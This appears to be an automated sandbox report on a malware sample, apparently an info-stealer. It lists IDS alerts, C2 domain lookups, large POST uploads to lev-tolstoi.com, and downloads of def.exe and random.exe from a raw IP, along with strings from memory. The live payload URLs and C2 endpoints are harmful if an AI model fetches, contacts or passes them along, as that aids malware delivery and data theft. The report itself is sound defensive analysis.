Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49699 -> 23.55.153.106:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49722 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49730 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49742 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49748 -> 185.215.113.16:80
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 47 | Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=S0XVJK104JSM607O | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12832 | Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=TI11QG7SJ91AKH1KW5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15076 | Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=NERBL1ALI8S6T2VM9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20395 | Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=0UA00PMMTMJ08TAX | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1223 | Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=W8TZCONWVG75XA8I | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 558918 | Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 82 | Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16 (50 identical entries collapsed; the payload host is addressed by IP literal in the GET requests above, so no DNS lookup precedes these connections)
Source: s31ydU1MpQ.exe, 00000000.00000003.1296626489.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queni equals www.youtube.com (Youtube)
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=6b6aee782ee003749cc6841d; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 23 Dec 2024 06:28:23 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control/Y< equals www.youtube.com (Youtube)
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: s31ydU1MpQ.exe, 00000000.00000003.1341740721.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr2G equals www.youtube.com (Youtube)
Source: s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic DNS traffic detected: DNS query: necklacebudi.lat
Source: global traffic DNS traffic detected: DNS query: energyaffai.lat
Source: global traffic DNS traffic detected: DNS query: aspecteirs.lat
Source: global traffic DNS traffic detected: DNS query: sustainskelet.lat
Source: global traffic DNS traffic detected: DNS query: crosshuaht.lat
Source: global traffic DNS traffic detected: DNS query: rapeflowwj.lat
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: lev-tolstoi.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: s31ydU1MpQ.exe, 00000000.00000003.1564929494.00000000012B5000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1565724088.00000000012BB000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1564712742.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: s31ydU1MpQ.exe, 00000000.00000003.1564712742.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Q=
Source: s31ydU1MpQ.exe, 00000000.00000003.1565171294.0000000005921000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1566016443.000000000592B000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1564712742.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1564712742.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe4
Source: s31ydU1MpQ.exe, 00000000.00000003.1564793183.0000000001311000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeKl
Source: s31ydU1MpQ.exe, 00000000.00000003.1565171294.0000000005921000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1566016443.000000000592B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeX
Source: s31ydU1MpQ.exe, 00000000.00000003.1564712742.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: s31ydU1MpQ.exe, 00000000.00000003.1564712742.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe1
Source: s31ydU1MpQ.exe, 00000000.00000003.1564712742.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeh
Source: s31ydU1MpQ.exe, 00000000.00000003.1564712742.0000000001321000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/zKH
Source: s31ydU1MpQ.exe, s31ydU1MpQ.exe, 00000000.00000003.1564929494.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.000000000103E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.0000000001082000.00000004.00000020.00020000.00000000.sdmp, BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.00000000010A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/urrentVersion
Source: BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1683875991.0000000001099000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341702498.0000000001326000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341702498.0000000001326000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341702498.0000000001326000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: s31ydU1MpQ.exe, 00000000.00000003.1390045533.000000000597B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: s31ydU1MpQ.exe, 00000000.00000003.1413578451.0000000005947000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414257749.000000000594A000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414085786.0000000005947000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: s31ydU1MpQ.exe, 00000000.00000003.1413578451.0000000005947000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414257749.000000000594A000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414085786.0000000005947000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: s31ydU1MpQ.exe, 00000000.00000003.1341740721.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.fastly.
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: s31ydU1MpQ.exe, 00000000.00000003.1341740721.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowBG
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_c
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1341702498.0000000001326000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296434845.000000000127B000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
